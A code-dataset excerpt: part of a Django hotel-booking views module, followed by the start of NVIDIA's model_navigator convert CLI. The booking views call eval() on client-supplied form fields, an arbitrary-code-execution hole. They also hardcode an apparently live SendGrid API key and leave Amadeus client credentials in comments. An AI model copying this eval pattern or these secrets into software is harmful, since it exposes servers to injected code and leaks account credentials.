).get('type', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n roomcat = myconst.get('offers', )[0].get('room', ).get('typeEstimated', ).get('category', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n bed = myconst.get('offers', )[0].get('room', ).get('typeEstimated', ).get('bedType', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n boardtype = myconst.get('offers', )[0].get('boardType', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n checkindate = myconst.get('offers', )[0].get('checkInDate', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n checkout = myconst.get('offers', )[0].get('checkOutDate', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n typeestimated = myconst.get('offers', )[0].get('room', ).get('typeEstimated', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n description = myconst.get('offers', )[0].get('room', ).get('description', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n guests = myconst.get('offers', )[0].get('guests', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n currency = myconst.get('offers', )[0].get('price', ).get('currency', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n\n print(e)\n try:\n base = myconst.get('offers', )[0].get('price', ).get('base', ),\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n total = myconst.get('offers', )[0].get('price', ).get('total', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n pricevariations = myconst.get('offers', )[0].get('price', ).get('variations', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n bedtype = myconst.get('offers', )[0].get('room', ).get('typeEstimated', ).get('bedType', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n creitcards = myconst.get('offers', )[0].get('policies', ).get('guarantee', ).get(\n 'acceptedPayments', ).get('creditCards', ),\n\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n acceptedPaymnts = myconst.get('offers', )[0].get('policies', ).get('guarantee', ).get(\n 'acceptedPayments', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n paymenttype = myconst.get('offers', )[0].get('policies', ).get('paymentType', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n checkinout = myconst.get('offers', )[0].get('policies', ).get('checkInOut', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n cancellation = myconst.get('offers', )[0].get('policies', ).get('cancellation', ),\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n mycontext = {\n 'offerid': offerid,\n\n 'citycode': citycode,\n 'countrycode': countrycode,\n 'availability': availability,\n 'roomtype': roomtype,\n 'roomcat': roomcat,\n 'bed': bed,\n 'bedtype': bedtype,\n 'checkindate': checkindate,\n 'checkout': checkout,\n 'boardtype': boardtype,\n 'typeestimated': typeestimated,\n 'description': description,\n 'guests': guests,\n 'currency': currency,\n 'base': base,\n 'total': total,\n 'pricevariations': pricevariations,\n 'creitcards': creitcards,\n 'acceptedPaymnts': acceptedPaymnts,\n 'paymenttype': paymenttype,\n 'checkinout': checkinout,\n 'cancellation': cancellation,\n 'hotelname': hotelname,\n\n }\n\n room = 
k\n context = {\n 'mycontext': mycontext,\n 'hoteldetailslist': hoteldetailslist,\n 'hoteldetails': hoteldetails,\n 'latitude': latitude,\n 'longitude': longitude,\n 'cityname': cityname,\n 'line': line,\n 'room': room,\n\n }\n\n print(\"---------------------------------------------------------------\", offerid)\n\n return render(request, 'roomdetails.html', context)\n\n else:\n return render(request, 'roomdetails.html')\n\n\nroomdetailslist = []\n\n\ndef bookingform(request, offerid):\n if request.method == 'POST':\n roomdetailslist.clear()\n hoteldetails = request.POST.get('hoteldetails', )\n roomdetails = request.POST.get('room', )\n roomdetails = eval(roomdetails)\n myconst = roomdetails\n\n checkindate = \"Not availlable\"\n checkout = \"Not availlable\"\n pricevariations = \"Not availlable\"\n creitcards = \"Not availlable\"\n acceptedPaymnts = \"Not availlable\"\n acceptedPayments = \"Not availlable\"\n\n paymenttype = \"Not availlable\"\n checkintime = \"Not availlable\"\n checkouttime = \"Not availlable\"\n cancellation = \"Not availlable\"\n total = \"Not availlable\"\n\n # percentage=\n base = \"Not availlable\"\n taxes = \"Not availlable\"\n currency = \"Not availlable\"\n\n try:\n checkindate = myconst.get('offers', )[0].get('checkInDate', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n checkout = myconst.get('offers', )[0].get('checkOutDate', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n pricevariations = myconst.get('offers', )[0].get('price', ).get('variations', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n creitcards = myconst.get('offers', )[0].get('policies', ).get('guarantee', ).get('acceptedPayments', ).get(\n 'creditCards', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n acceptedPayments = myconst.get('offers', )[0].get('policies', ).get('guarantee', ).get(\n 'acceptedPayments', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n acceptedPayments = myconst.get('offers', )[0].get('policies', ).get('deposit', ).get(\n 'acceptedPayments', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n paymenttype = myconst.get('offers', )[0].get('policies', ).get('paymentType', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n checkintime = myconst.get('offers', )[0].get('policies', ).get('checkInOut', ).get('checkIn', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n checkouttime = myconst.get('offers', )[0].get('policies', ).get('checkInOut', ).get('checkOut', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n cancellation = myconst.get('offers', )[0].get('policies', ).get('cancellation', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n total = myconst.get('offers', )[0].get('price', ).get('total', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n base = myconst.get('offers', )[0].get('price', ).get('base', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n taxes = myconst.get('offers', )[0].get('price', ).get('total', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n currency = myconst.get('offers', )[0].get('price', ).get('currency', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n if base == None:\n try:\n base = myconst.get('offers')[0].get('price').get('variations').get('changes')[0].get('base')\n 
except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n tax = \"Not Avaiabe\"\n try:\n tax = float(total) - float(base)\n except TypeError as e:\n print(e)\n print(tax)\n\n room = {\n\n 'checkindate': checkindate,\n 'checkout': checkout,\n 'pricevariations': pricevariations,\n 'creitcards': creitcards,\n 'acceptedPayments': acceptedPayments,\n 'paymenttype': paymenttype,\n 'checkintime': checkintime,\n 'checkouttime': checkouttime,\n 'cancellation': cancellation,\n 'total': total,\n\n # 'percentage':percentage ,\n 'base': base,\n 'tax': tax,\n 'currency': currency,\n\n }\n roomdetailslist.append(room)\n\n k = eval(hoteldetails)\n\n media = \"Not availlable\"\n cityname = \"Not availlable\"\n hotelname = \"Not availlable\"\n line = \"Not availlable\"\n ammenitiesraw = \"Not availlable\"\n\n try:\n media = k.get('hotel', ).get('media', )[0].get('uri', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n cityname = k.get('hotel', ).get('address', ).get('cityName', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n hotelname = k.get('hotel', ).get('name', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n line = k.get('hotel', ).get('address', ).get('lines', )[0]\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n ammenitiesraw = k.get('hotel', ).get('amenities', )[:3]\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n ammenities = []\n for i in ammenitiesraw:\n i = i.replace('_', ' ')\n\n i = i.lower()\n ammenities.append(i)\n\n context = {\n 'offerid': offerid,\n 'cityname': cityname,\n 'hotelname': hotelname,\n 'line': line,\n 'media': media,\n 'ammenities': ammenities,\n 'roomdetailslist': roomdetailslist,\n 'hoteldetails': hoteldetails,\n }\n\n print(\"---------------------------------------------------------------\", offerid)\n\n return render(request, 'book.html', context)\n else:\n\n return render(request, 'book.html')\n\n\nbookcontext = []\n\n\ndef book(request, offerid):\n bookcontext.clear()\n if request.method == 'POST':\n hoteldetails = request.POST.get('hoteldetails', )\n roomdetails = request.POST.get('roomdetails', )\n\n title = request.POST.get('title', )\n firstname = request.POST.get('FirstName', )\n lastname = request.POST.get('LastName', )\n phoneno = request.POST.get('phone', )\n email = request.POST.get('email', )\n cardVendorCode = request.POST.get('card_vendor_code', )\n Card_number = request.POST.get('card_number', )\n Expiry = request.POST.get('expiry', )\n # print(offerid, title, firstname, lastname, email, phoneno,cardVendorCode,Card_number,Expiry)\n offer = offerid\n\n k = eval(hoteldetails)\n room = eval(roomdetails)\n # print(\"this is expiry---------------------- \", Expiry)\n\n ammenitiesraw = \"Not availlable\"\n media = \"Not availlable\"\n cityname = \"Not availlable\"\n hotelname = \"Not availlable\"\n line = \"Not availlable\"\n latitude = \"Not availlable\"\n longitude = \"Not availlable\"\n phone = \"Not availlable\"\n\n try:\n ammenitiesraw = k.get('hotel', ).get('amenities', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n media = k.get('hotel', ).get('media', )[0].get('uri', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n cityname = k.get('hotel', ).get('address', ).get('cityName', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n hotelname = k.get('hotel', ).get('name', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n 
try:\n line = k.get('hotel', ).get('address', ).get('lines', )[0]\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n latitude = k.get('hotel', ).get('latitude', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n longitude = k.get('hotel', ).get('longitude', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n phone = k.get('hotel', ).get('contact', ).get('phone', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n # amadeus = Client(\n # client_id='3MCFjLGhW3lJwBJtdAMirNGkc8FUoL4s',\n # client_secret='OJEffyNYNtbPandi',\n #\n # )\n\n try:\n\n # offer = \"OXZEHRM5GS\"\n # #\n # guests = [{'id': 1, 'name': {'title': 'MR', 'firstName': 'BOB', 'lastName': 'SMITH'},\n # 'contact': {'phone': '+33679278416', 'email': 'bob.smith@email.com'}}]\n # payments = {'id': 1, 'method': 'creditCard',\n # 'card': {'vendorCode': 'VI', 'cardNumber': '4151289722471370', 'expiryDate': '2021-08'}}\n guests = [{'id': 1,'name': {'title': title, 'firstName': firstname, 'lastName': lastname},\n 'contact': {'phone': phone, 'email': email}}]\n payments = {'method': 'creditCard',\n 'card': {'vendorCode': cardVendorCode, 'cardNumber': Card_number,\n 'expiryDate': Expiry}} # '2021-08'\n\n hotel_booking = amadeus.booking.hotel_bookings.post(offer, guests, payments)\n\n data = hotel_booking.data\n # print('this is data',data)\n\n except ResponseError as error:\n print('this is ', error)\n return render(request, 'bookfailed.html', )\n\n\n\n else:\n confirmationID = \"Not available\"\n providerConfirmationId = \"Not available\"\n try:\n confirmationID = data[0].get('id', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n providerConfirmationId = data[0].get('providerConfirmationId', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n # try:\n # offer_availability = amadeus.shopping.hotel_offer(offerid).get()\n # # print('this is offer availlability', offer_availability.data)\n # k = offer_availability.data\n # # print('i have offer availlability')\n #\n # except ResponseError as error:\n # print('this is ', error)\n #\n #\n # else:\n myconst = room\n\n checkindate = \"Not availlable\"\n checkout = \"Not availlable\"\n pricevariations = \"Not availlable\"\n creitcards = \"Not availlable\"\n acceptedPaymnts = \"Not availlable\"\n acceptedPayments = \"Not availlable\"\n\n paymenttype = \"Not availlable\"\n checkintime = \"Not availlable\"\n checkouttime = \"Not availlable\"\n cancellation = \"Not availlable\"\n total = \"Not availlable\"\n\n # percentage=\n base = \"Not availlable\"\n taxes = \"Not availlable\"\n currency = \"Not availlable\"\n\n try:\n checkindate = myconst.get('checkindate', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n checkout = myconst.get('checkout', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n pricevariations = myconst.get('pricevariations', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n # try:\n # creitcards = myconst.get('offers', )[0].get('policies', ).get('guarantee', ).get(\n # 'acceptedPayments', ).get('creditCards', )\n #\n # except ( KeyError,AttributeError, TypeError ) as e:\n # print(e)\n try:\n acceptedPayments = myconst.get('acceptedPayments')\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n # try:\n # paymenttype = myconst.get('offers', )[0].get('policies', ).get('paymentType', )\n #\n # except ( KeyError,AttributeError, TypeError ) as e:\n # 
print(e)\n try:\n checkintime = myconst.get('offers', )[0].get('policies', ).get('checkInOut', ).get('checkIn',\n )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n checkouttime = myconst.get('offers', )[0].get('policies', ).get('checkInOut', ).get(\n 'checkOut', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n cancellation = myconst.get('cancellation')\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n total = myconst.get('total', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n base = myconst.get('base', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n try:\n taxes = myconst.get('tax', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n try:\n currency = myconst.get('currency', )\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n tax = \"None\"\n try:\n tax = float(total) - float(base)\n except (ValueError) as e:\n print(e)\n\n guests = \" \"\n\n try:\n guests = myconst.get('offers', )[0].get('guests', ).get('adults', )\n\n except (KeyError, AttributeError, TypeError) as e:\n print(e)\n\n booking = Bookings(first_name=firstname, last_name=lastname, email=email, phone=phoneno,\n\n image=media, offerid=offerid, confirmationID=confirmationID,\n providerConfirmationId=providerConfirmationId, Check_in=checkindate, Check_out=checkout,\n Guests=guests, Price=total, currency=currency, hotel_name=hotelname, )\n booking.save()\n\n # sending booking mail\n ms = '''\n\n\n\n
Booking successful.\n\nHello {firstname},\n\nYour booking Confirmation Id is : {confirmationID}.
\n your provider confirmation ID is: { providerConfirmationId }\n\n\n\n\n '''\n\n message = Mail(\n from_email='info@sky-swift.com',\n to_emails=email,\n subject='Hotel Booking',\n html_content=ms,\n\n )\n\n try:\n sg = SendGridAPIClient('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')\n response = sg.send(message)\n print(response.status_code)\n print(response.body)\n print(response.headers)\n\n except Exception as e:\n print('not working', e)\n\n context = {\n 'email': email,\n 'firstname': firstname,\n\n 'lastname': lastname,\n 'phone': phone,\n 'cityname': cityname,\n 'latitude': latitude,\n 'longitude': longitude,\n 'line': line,\n 'hotelname': hotelname,\n 'checkindate': checkindate,\n 'checkout': checkout,\n 'pricevariations': pricevariations,\n 'creitcards': creitcards,\n 'acceptedPayments': acceptedPayments,\n 'paymenttype': paymenttype,\n 'checkintime': checkintime,\n 'checkouttime': checkouttime,\n 'cancellation': cancellation,\n 'total': total,\n 'confirmationID': confirmationID,\n\n 'providerConfirmationId': providerConfirmationId,\n\n # 'percentage':percentage ,\n 'base': base,\n 'tax': tax,\n 'currency': currency,\n }\n\n bookcontext.append(context)\n\n context = {\n 'bookcontext': bookcontext,\n }\n return render(request, 'bookconf.html', context)\n\n# #\n# # def apicall(request):\n# # return render(request,'index.html')\n# from sendgrid import SendGridAPIClient\n# from sendgrid.helpers.mail import Mail\n# from .utils import account_activation_token\n#\n#\n# @sync_to_async\n# def crunching_stuff():\n# sleep(20)\n# json_payload = {\n# \"message\": \"Hello world\"\n# }\n# print(\"Woke up after 10 seconds!\")\n# return json_payload\n#\n# async def apicall(request):\n#\n# \"\"\"\n# or also\n# asyncio.ensure_future(crunching_stuff())\n# loop.create_task(crunching_stuff())\n# \"\"\"\n#\n# asyncio.create_task(crunching_stuff())\n# q=crunching_stuff()\n#\n# context = {\n# 'q':q\n# }\n# return render(request, 'index.html', context)\n#\n# #\n# # def apicall(request):\n# # q=crunching_stuff()\n# # context={\n# # 'q':q\n# # }\n# # return render(request, 'index.html',context)\n#\n#\n# def loginfunction(request):\n# if request.method == 'POST':\n# pass\n# else:\n#\n#\n# return render(request,'login.html')\n#\n#\n# def signup(request):\n# if request.method=='POST':\n# pass\n# else:\n# return render(request,'signup.html')\n#\n#\n#\n# def signup(request):\n# if request.method == \"POST\":\n# email = request.POST.get('email', False)\n# password = request.POST['password']\n# confirm_password = request.POST['confirmpassword']\n# print(email,password)\n#\n# # if re.fullmatch(r'[A-Za-z0-9]{8,}', password):\n#\n# if password == confirm_password:\n# # l, u, p, d = 0, 0, 0, 0\n# #\n# # s = password\n# # if (len(s) >= 8):\n# # for i in s:\n# #\n# # # counting lowercase alphabets\n# # if (i.islower()):\n# # l += 1\n# #\n# # # counting uppercase alphabets\n# # if (i.isupper()):\n# # u += 1\n# #\n# # # counting digits\n# # if (i.isdigit()):\n# # d += 1\n# #\n# # # counting the mentioned special characters\n# # if (i == '@' or i == '$' or i == '_'):\n# # p += 1\n# # if (l >= 1 and u >= 1 and p >= 1 and d >= 1 and l + p + u + d == len(s)):\n# # print(\"Valid Password\")\n# if User.objects.filter(email=email).exists():\n#\n# messages.warning(request, 'Email exists!')\n# return render(request, 'signup.html')\n#\n#\n# else:\n# user = User.objects.create_user(email=email, username=email, password=password\n# )\n# user.save()\n# messages.success(request, 'Account created 
sucessfully!')\n# user = authenticate(username=email, password=password)\n# login(request,user)\n# user.refresh_from_db()\n#\n#\n#\n#\n#\n#\n# return redirect('/')\n#\n# # else:\n# # print(\"Invalid Password\")\n# # messages.warning(request, 'Password Must contain numbers,letters and Symbols!')\n# #\n# # return render(request,'signup.html')\n#\n# # # send_mail(\n# # # 'Account creation',\n# # # 'Hello,welcome to the Maskani family. Your account creation was successful.Should you have any queries just send us an email or call our customer care numbers. here is a guide to get you started',\n# # # 'firstregapp@gmail.com',\n# # # [email],\n# # # fail_silently=True,\n# # #\n# # # )\n# #\n# # print(\"sign up sucessful\")\n# #\n# # return redirect('/')\n# # # else:\n# # return HttpResponse('invalid email')\n# else:\n# messages.info(request, 'Passwords do not match!')\n# return render(request,'signup.html')\n#\n# # else:\n# # return HttpResponse('password must contain charachters,numbers and uppercase letters')\n#\n# else:\n# return render(request,'signup.html')\n#\n#\n# def login_function(request):\n# if request.method==\"POST\":\n# username = request.POST.get('email', False)\n# password = request.POST['password']\n# user = authenticate(username=username, password=password)\n#\n# if user is not None:\n# if user.is_active:\n# login(request, user)\n#\n#\n#\n#\n# return redirect('/')\n# # return HttpResponse(f'{ profile }')#f'profileupdate/{pk}/update\n# else:\n# messages.info(request, 'Your Account is Inactive')\n# return render(request,'login.html')\n#\n# else:\n# messages.info(request, 'Wrong username/Password!')\n# return render(request,'login.html')\n#\n# else:\n# return render(request,'login.html')\n#\n#\n\n\n#\n#\n#\n","sub_path":"hotels/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":44548,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"641887179","text":"# Copyright (c) 2021, NVIDIA CORPORATION. 
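The booking views in the record above repeat the same try/except pattern around every chained .get() call. A hypothetical helper — deep_get and the sample offer dict below are invented for illustration and are not part of the original views.py — shows how those blocks could collapse into a single lookup:

def deep_get(obj, *path, default="Not available"):
    """Walk nested dicts/lists by keys/indices; return `default` on any miss."""
    current = obj
    for step in path:
        try:
            current = current[step]
        except (KeyError, IndexError, TypeError):
            return default
    return current

offer = {"offers": [{"price": {"total": "120.00"}}]}
print(deep_get(offer, "offers", 0, "price", "total"))  # 120.00
print(deep_get(offer, "offers", 0, "price", "base"))   # Not available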
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport dataclasses\nimport itertools\nimport logging\nimport os\nimport shutil\nimport sys\nfrom pathlib import Path\nfrom typing import List, Optional, Sequence\n\nimport click\nfrom docker.errors import DockerException\nfrom docker.types import DeviceRequest\nfrom docker.utils import parse_repository_tag\n\nfrom model_navigator.cli.spec import (\n ComparatorConfigCli,\n ConversionSetConfigCli,\n DatasetProfileConfigCli,\n ModelConfigCli,\n ModelSignatureConfigCli,\n)\nfrom model_navigator.constants import MODEL_NAVIGATOR_DIR\nfrom model_navigator.converter import (\n ComparatorConfig,\n ConversionConfig,\n ConversionLaunchMode,\n ConversionResult,\n Converter,\n DatasetProfileConfig,\n)\nfrom model_navigator.converter.config import TensorRTPrecision\nfrom model_navigator.converter.utils import FORMAT2FRAMEWORK\nfrom model_navigator.device.utils import get_gpus\nfrom model_navigator.exceptions import ModelNavigatorCliException, ModelNavigatorException\nfrom model_navigator.framework import SUFFIX2FRAMEWORK\nfrom model_navigator.log import init_logger, log_dict\nfrom model_navigator.model import Format, Model, ModelConfig, ModelSignatureConfig\nfrom model_navigator.results import ResultsStore, State\nfrom model_navigator.utils import Workspace\nfrom model_navigator.utils.cli import clean_workspace_if_needed, common_options, options_from_config\nfrom model_navigator.utils.config import BaseConfig, YamlConfigFile\nfrom model_navigator.utils.docker import DockerBuilder, DockerImage\nfrom model_navigator.utils.source import navigator_install_url, navigator_is_editable\nfrom model_navigator.validators import run_command_validators\n\nLOGGER = logging.getLogger(\"convert\")\n\n_RUN_BY_MODEL_NAVIGATOR = \"MODEL_NAVIGATOR_RUN_BY\"\n\nTRITON_SUPPORTED_FORMATS = [Format.TF_SAVEDMODEL, Format.ONNX, Format.TENSORRT, Format.TORCHSCRIPT]\n\n\n@dataclasses.dataclass\nclass ConversionSetConfig(BaseConfig):\n target_formats: List[Format] = dataclasses.field(default_factory=lambda: TRITON_SUPPORTED_FORMATS)\n target_precisions: List[TensorRTPrecision] = dataclasses.field(\n default_factory=lambda: [TensorRTPrecision.FP16, TensorRTPrecision.TF32]\n )\n # ONNX related\n onnx_opsets: List[int] = dataclasses.field(default_factory=lambda: [13])\n # TRT related\n max_workspace_size: Optional[int] = None\n\n def __iter__(self):\n parameters = [self.target_formats, self.onnx_opsets]\n combinations = itertools.product(*parameters)\n # FIXME: this is workaround for now\n for target_format, onnx_opset in combinations:\n if target_format == Format.TENSORRT:\n yield from self._tensorrt_config(onnx_opset)\n else:\n yield from self._conversion_config(target_format, onnx_opset)\n\n @classmethod\n def from_single_config(cls, config: ConversionConfig):\n if not config.target_format:\n return cls(\n target_formats=[],\n target_precisions=[],\n onnx_opsets=[],\n max_workspace_size=config.max_workspace_size,\n )\n\n return cls(\n 
target_formats=[config.target_format],\n target_precisions=[config.target_precision] if config.target_precision else [],\n onnx_opsets=[config.onnx_opset] if config.onnx_opset else [],\n max_workspace_size=config.max_workspace_size,\n )\n\n def _tensorrt_config(self, onnx_opset):\n for target_precision in self.target_precisions:\n config = ConversionConfig(\n target_format=Format.TENSORRT,\n target_precision=target_precision,\n onnx_opset=onnx_opset,\n max_workspace_size=self.max_workspace_size,\n )\n yield config\n\n def _conversion_config(self, target_format, onnx_opset):\n config = ConversionConfig(\n target_format=target_format,\n target_precision=None,\n onnx_opset=onnx_opset,\n max_workspace_size=self.max_workspace_size,\n )\n yield config\n\n\ndef _run_locally(\n *,\n workspace: Workspace,\n override_workspace: bool = False,\n src_model_config: ModelConfig,\n model_signature_config: Optional[ModelSignatureConfig] = None,\n conversion_set_config: ConversionSetConfig,\n comparator_config: Optional[ComparatorConfig] = None,\n dataset_profile_config: Optional[DatasetProfileConfig] = None,\n verbose: bool = False,\n) -> Sequence[ConversionResult]:\n if not os.environ.get(_RUN_BY_MODEL_NAVIGATOR):\n clean_workspace_if_needed(workspace, override_workspace)\n\n converter = Converter(workspace=workspace, verbose=verbose)\n conversion_results = []\n for conversion_config in conversion_set_config:\n results = converter.convert(\n src_model=src_model_config,\n conversion_config=conversion_config,\n signature_config=model_signature_config,\n comparator_config=comparator_config,\n dataset_profile_config=dataset_profile_config,\n )\n\n results = list(results)\n conversion_results.extend(results)\n\n return conversion_results\n\n\ndef _run_in_docker(\n *,\n workspace: Workspace,\n override_workspace: bool = False,\n src_model_config: ModelConfig,\n model_signature_config: Optional[ModelSignatureConfig] = None,\n conversion_set_config: ConversionSetConfig,\n comparator_config: Optional[ComparatorConfig] = None,\n dataset_profile_config: Optional[DatasetProfileConfig] = None,\n framework_docker_image: str,\n model_format: Format,\n gpus: Optional[List[str]] = None,\n verbose: bool = False,\n override_conversion_container: bool = False,\n) -> Sequence[ConversionResult]:\n clean_workspace_if_needed(workspace, override_workspace)\n\n config_path = workspace.path / \"convert.yaml\"\n with YamlConfigFile(config_path) as config_file:\n config_file.save_config(src_model_config)\n config_file.save_config(model_signature_config)\n config_file.save_config(conversion_set_config)\n config_file.save_config(comparator_config)\n config_file.save_config(dataset_profile_config)\n\n framework = FORMAT2FRAMEWORK[model_format]\n _, framework_docker_tag = parse_repository_tag(framework_docker_image)\n converter_docker_image = f\"model_navigator_converter:{framework_docker_tag}\"\n\n build_args = {\n \"FROM_IMAGE_NAME\": framework_docker_image,\n }\n\n if navigator_is_editable():\n dockerfile_path = MODEL_NAVIGATOR_DIR / \"model_navigator/converter/Dockerfile.local\"\n else:\n dockerfile_path = MODEL_NAVIGATOR_DIR / \"model_navigator/converter/Dockerfile.remote\"\n install_url = navigator_install_url(framework)\n build_args[\"INSTALL_URL\"] = install_url\n\n LOGGER.debug(f\"Base converter image: {framework_docker_image}\")\n LOGGER.debug(f\"Converter image: {converter_docker_image}\")\n\n conversion_image = DockerImage(converter_docker_image)\n if not conversion_image.exists() or override_conversion_container:\n 
conversion_image = DockerBuilder().build(\n dockerfile_path=dockerfile_path,\n image_name=converter_docker_image,\n workdir_path=MODEL_NAVIGATOR_DIR,\n build_args=build_args,\n )\n\n # run docker container\n verbose_flag = \"-v\" if verbose else \"\"\n workspace_flags = f\"--workspace-path {workspace.path}\"\n workspace_flags += \" --override-workspace\" if override_workspace else \"\"\n cmd = (\n \"bash -c 'model-navigator convert \"\n f\"--config-path {config_path} \"\n f\"--launch-mode local \"\n f\"{verbose_flag} \"\n f\"{workspace_flags}'\"\n )\n gpus = get_gpus(gpus)\n devices = [DeviceRequest(device_ids=[gpus[0]], capabilities=[[\"gpu\"]])]\n cwd = Path.cwd()\n\n required_paths = [workspace.path, src_model_config.model_path.parent, cwd]\n required_paths = sorted({p.resolve() for p in required_paths})\n\n env = {\"PYTHONPATH\": cwd.resolve().as_posix(), _RUN_BY_MODEL_NAVIGATOR: 1}\n container = conversion_image.run_container(\n devices=devices, workdir_path=cwd, mount_as_volumes=required_paths, environment=env\n )\n\n try:\n LOGGER.debug(f\"Running cmd: {cmd}\")\n container.run_cmd(cmd, stdin=sys.stdin, stdout=sys.stdout, stderr=sys.stderr)\n except DockerException as e:\n raise e\n finally:\n LOGGER.debug(f\"Killing docker container {container.id[:8]}\")\n container.kill()\n\n results_store = ResultsStore(workspace)\n results = results_store.load(\"convert_model\")\n\n # update framework_docker_image when run conversion in docker container\n results = [dataclasses.replace(result, framework_docker_image=framework_docker_image) for result in results]\n results_store.dump(\"convert_model\", results)\n\n return results\n\n\ndef _copy_to_output_path(conversion_results: Sequence[ConversionResult], output_path):\n output_path = Path(output_path)\n\n successful_conversion_results = [r for r in conversion_results if r.status.state == State.SUCCEEDED]\n\n result_to_copy = None\n if not successful_conversion_results:\n LOGGER.warning(\"Obtained no successful conversion results for given model and conversion parameters\")\n elif len(successful_conversion_results) > 1:\n msg = f\"Obtained more than 1 successful conversion result - copy just first one into {output_path}.\"\n LOGGER.warning(msg)\n result_to_copy = successful_conversion_results[0]\n else:\n result_to_copy = successful_conversion_results[0]\n\n if result_to_copy is not None:\n result_model_path = result_to_copy.output_model.path\n LOGGER.debug(f\"Copy {result_model_path} to {output_path}\")\n if result_model_path.is_dir():\n shutil.copytree(result_model_path, output_path)\n else:\n shutil.copy(result_model_path, output_path)\n # copy also supplementary files - ex. 
model io annotation file\n # they have just changed suffix comparing to model path\n for supplementary_file in result_model_path.parent.glob(f\"{result_model_path.stem}.*\"):\n if supplementary_file == result_model_path:\n continue\n supplementary_file_output_path = output_path.parent / f\"{output_path.stem}{supplementary_file.suffix}\"\n LOGGER.debug(f\"Copy {supplementary_file} to {supplementary_file_output_path}\")\n shutil.copy(supplementary_file, supplementary_file_output_path)\n\n\n# TODO: nargs????\n\n\ndef convert(\n *,\n workspace_path: Path,\n override_workspace: bool,\n verbose: bool,\n output_path: Optional[str],\n container_version: str,\n framework_docker_image: Optional[str],\n gpus: Optional[List[str]],\n launch_mode: ConversionLaunchMode = ConversionLaunchMode.DOCKER,\n override_conversion_container: bool = False,\n **kwargs,\n):\n src_model_config = ModelConfig.from_dict(kwargs)\n src_model_signature_config = ModelSignatureConfig.from_dict(kwargs)\n conversion_set_config = ConversionSetConfig.from_dict(kwargs)\n comparator_config = 